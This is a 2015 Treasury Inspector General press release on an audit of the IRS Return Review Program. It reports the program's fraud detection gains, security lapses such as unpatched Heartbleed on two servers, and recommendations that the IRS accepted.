Treasury Inspector General for Tax Administration
September 22, 2015
TIGTA - 2015-29
Contact: David Barnes
WASHINGTON – The new Return Review Program (RRP) being tested by the Internal Revenue Service (IRS) is enhancing the identification of tax return fraud, but system security needs improvement.
That is the conclusion of a new report publicly released today by the Treasury Inspector General for Tax Administration (TIGTA).
Tax fraud is a major challenge for the IRS. The IRS chartered the initiation of the RRP in 2009 to replace the Electronic Fraud Detection System (EFDS). Development of the RRP entered a strategic pause in January 2014 to allow the IRS time to evaluate the performance and design of the parallel processing database and to revisit strategic business fraud detection goals. The objective of the audit was to determine if the RRP effectively meets requirements and identifies fraudulent tax returns.
TIGTA found that during an IRS pilot, the RRP models flagged potential identity theft fraud not detected by the EFDS models. During a 32 day test, the RRP Identity Theft Model identified 51,946 returns as potential identity theft cases. The IRS confirmed that 41,311 of those returns involved identity theft. Of the confirmed identity theft cases, the IRS determined that 10,348 cases (25 percent) totaling $43 million in refunds were not detected by the EFDS or the Dependent Database.
In addition, IRS tests showed that eight million returns a day can be loaded to the RRP database as required. For example, over a one-week period the RRP consistently loaded between seven million and nine million returns a day.
However, the IRS classified the RRP as a Level 3 system (an information resource instead of a major system). Because the RRP was classified as a Level 3 Federal Information Security Management Act system, RRP-specific security issues may not be effectively addressed. In addition, identified security vulnerabilities were not remediated. For example, the October 2014 network scans identified two RRP servers that were still vulnerable to the Heartbleed bug six months after the vulnerability was announced.
“The RRP test results show potential improvements in the IRS approach to prevent, detect, and resolve pre-refund tax fraud,” said J. Russell George, Treasury Inspector General for Tax Administration. “While these potential improvements are encouraging, the IRS must also ensure the system is properly classified and meets security requirements.”
TIGTA recommended that the Chief Technology Officer ensure that: 1) IRS personnel completing the Federal Information Security Management Act system classifications are familiar with the Act’s requirements; 2) the validation of system classification and reclassification is discussed, reviewed, and documented during the biweekly cybersecurity management meeting; and 3) all critical and high-risk RRP vulnerabilities are resolved.
The IRS agreed with TIGTA’s three recommendations. It plans to brief personnel on the Federal Information Security Management Act requirements for each level of classification; enhance its current process for the validation of system classification and reclassification as discussed, reviewed, and documented during the biweekly management meeting; and focus on resolving the critical vulnerabilities in production and then the lower environments.
Read the report.
Note: The difference between the date TIGTA issues an audit report to the Internal Revenue Service and the date TIGTA publicly releases the report is due to TIGTA's internal review process to ensure that public release is in compliance with Federal confidentiality laws.
A special plugin is required to view PDF documents. To obtain the free PDF reader, please visit the Adobe web site.